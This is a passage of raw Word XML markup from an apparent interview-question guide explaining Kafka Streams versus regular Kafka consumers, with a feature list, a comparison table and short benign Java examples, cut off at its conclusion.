    <w:p w14:paraId="6137A506" w14:textId="57DF23AA" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A17F31">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03B4C58">
          <v:rect id="_x0000_i3170" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2BA63" w14:textId="59A359BF" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB1CF5" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="792" w:name="_Toc196308272"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Kafka Streams, and how are they different from regular Kafka consumers</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="792"/>
    </w:p>
    <w:p w14:paraId="2A7E3921" w14:textId="1BB5CEC7" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 Streams Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47626FD2"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afka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Java library for building real-time stream processing applications that process data stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It enables developers to perform complex transformations and aggregations of data directly within Kafka, making it suitable for processing large volumes of data in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2668940C"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lastRenderedPageBreak/>
        <w:t>Kafka Streams simplifies the development of applications by providing high-level abstractions for stream processing and integrating seamlessly with Kafka producers and consumers. It allows you to consume, process, and produce data back to Kafka topics with ease.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15045226" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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ey Features of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D041B6" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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High-level API</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams provides a functional API to define transformations on Kafka topics, such as filtering, grouping, joining, and aggregating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D75CF04" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams benefits from Kafka’s fault tolerance and distributed nature. It provides automatic handling of failures and retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B939581" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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tateful and Stateless Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can perform both stateful (e.g., joins, aggregations) and stateless operations (e.g., filtering, mapping) on streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DB79E3" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams can scale horizontally by adding more instances to process data in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DFD566" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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Windowing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams supports windowing, allowing you to process data over specific time periods (e.g., tumbling or sliding windows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0AA563" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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ntegrated with Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams works directly with Kafka topics and Kafka brokers, making it simple to implement stream processing without needing a separate infrastructure like Apache Flink or Apache Spark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277A00D" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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Exactly Once Semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams provides the ability to process messages with exactly-once semantics (EOS), ensuring no duplication or data loss during processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724411CC" w14:textId="77777777" w:rsidR="00B63B45"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7794683">
          <v:rect id="_x0000_i3171" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="386BC1B6" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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Difference Between Kafka Streams and Regular Kafka Consum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5"/>
        <w:gridCol w:w="4328"/>
        <w:gridCol w:w="3931"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="73ABEB05" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18F32DAC" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="442BEF0F" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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 Streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="647EE88A" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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Regular Kafka Consumers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="4AFC6615" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25640672"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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0957FEFC"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Designed for stream processing applications (real-time data processing, transformations).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FDDCC89"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imarily for consuming messages from Kafka topics for processing or other uses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6F387531" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FE503F4"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rocessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD576B1"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Supports both </w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>stateful</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stateless</w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> processing (aggregations, joins, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B372FFA"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ypically used for stateless consumption and processing of messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="4E1B8704" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F4BDCD"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tate Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F225BFB"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Streams can maintain state (e.g., in a local store) to enable operations like windowing, joins, and aggregations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="242F855A"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Regular consumers don’t manage state on their own, they just consume messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="56431666" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11177C92"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nternal State Stores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D12B7E4"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Streams provides an in-built key-value store to persist the state across restarts and handle stateful operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62259146"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Regular consumers don’t maintain internal state across invocations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6AEE2553" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66BF3D70"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Fault Tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51A4F197"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Built-in fault tolerance and recovery from Kafka's inherent fault-tolerant architecture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FD50A05"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Regular consumers rely on Kafka's offset management for fault tolerance, but don't have internal recovery features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="1898E6E5" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D1AD43E"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arallelism and Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="194D285D"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Streams applications can scale horizontally across multiple instances. It uses Kafka's partitioning to distribute processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40124975"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Regular consumers can consume from multiple partitions, but parallelism and scaling have to be managed manually.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="69788953" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CDEAD6B"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Exactly Once Semantics (EOS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45AFADA0"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Streams supports </w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exactly Once Semantics (EOS)</w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, ensuring no message duplication or data loss in processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FA49F19"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Regular Kafka consumers don’t support EOS by default; they may rely on manual offset management to ensure processing reliability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="701D702E" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5039301C"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ntegration with Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CF77EC9"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Streams integrates tightly with Kafka brokers and topics. It can consume from, process, and produce back to Kafka topics in real time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DC7ABF9"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Regular consumers consume messages from Kafka topics but don’t automatically produce processed results back into Kafka (unless explicitly coded).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="452E648D" w14:textId="77777777" w:rsidTr="00B63B45">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34659750"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implified Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="386AA29E"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Streams abstracts many complexities like offset management, fault tolerance, and processing semantics, allowing developers to focus on business logic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DED56F8"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Regular Kafka consumers require developers to handle most of the fault tolerance, offset management, and integration complexities manually.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FD443D3" w14:textId="77777777" w:rsidR="00B63B45"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2292D127">
          <v:rect id="_x0000_i3172" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3ABDE2" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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 Streams Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419364D6"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Here’s an example of using Kafka Streams to process a stream of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E90487F"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StreamsBuilder builder = new StreamsBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103A196A" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEDB2DA"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Define a simple stream processing operation: map each message to uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF329A3"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Stream&lt;String, String&gt; sourceStream = builder.stream("input-topic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17914741"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Stream&lt;String, String&gt; transformedStream = sourceStream.mapValues(value -&gt; value.toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6757F7" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A65FEC"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Send the processed data to an output topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA9543"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ransformedStream.to("output-topic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFCEB7B" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E293BF"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Streams streams = new KafkaStreams(builder.build(), properties);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4AB37F"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streams.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD4CFF4"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n this example, Kafka Streams consumes messages from the input-topic, transforms the messages by converting them to uppercase, and produces the transformed messages to the output-topic. The application is fault-tolerant and can be scaled across multiple instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A8730" w14:textId="77777777" w:rsidR="00B63B45"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56E9C88">
          <v:rect id="_x0000_i3173" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A611FCA" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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Regular Kafka Consumer Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D830A"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For comparison, a regular Kafka consumer might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068FDCF"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Consumer&lt;String, String&gt; consumer = new KafkaConsumer&lt;&gt;(properties);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DDCCAF"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sumer.subscribe(Arrays.asList("input-topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66023149" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D29A3F1"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183605E"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sumerRecords&lt;String, String&gt; records = consumer.poll(Duration.ofMillis(1000));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814CDE3"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for (ConsumerRecord&lt;String, String&gt; record : records) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012B7235"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 Process each record here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC90E94"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System.out.println(record.value());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E412DDE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75896474"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DFA8EF" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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n the regular consumer example, the consumer simply reads messages from the input-topic and processes them. There's no transformation, fault tolerance, or state management like in Kafka Streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496096CA" w14:textId="77777777" w:rsidR="00B63B45"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F7805AB">
          <v:rect id="_x0000_i3174" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1985A58B" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B4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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C7706" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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afka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
